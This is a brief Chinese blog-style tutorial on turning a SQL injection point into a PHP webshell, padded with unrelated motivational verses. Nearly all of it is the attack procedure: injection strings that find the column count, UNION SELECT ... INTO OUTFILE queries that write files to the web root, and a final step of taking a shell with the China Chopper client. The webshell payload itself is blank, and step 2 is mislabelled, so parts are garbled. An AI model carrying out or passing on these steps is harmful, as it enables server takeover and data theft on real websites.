SQL注入实战— SQL注入写一句话木马

          总感觉好像漏了一点点东西,就是我们SQL注入后也是可以通过注入点上传一句话话木马的。

          废话不多说,咋们直接来看实际操作步骤,操作如下:


当你的才华

还撑不起你的野心时

那你就应该静下心来学习

 


 

写入一句话木马:

  1. 判断长度

 ?id=1’ order by 7--+

     2. 创建目录

 ?id=1’ union select 1,2,3,4,5,6,7 into outfile ‘/etc/www/test.txt’ --+

     3. 写一句话木马进文件

 ?id=1’ union select 1,2,3,4,5,6,’’  into outfile ‘/etc/www/test.php’ --+

     4. 使用中国菜刀提shell


我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重


 

你可能感兴趣的:(渗透测试,SQL注入,前渗透篇)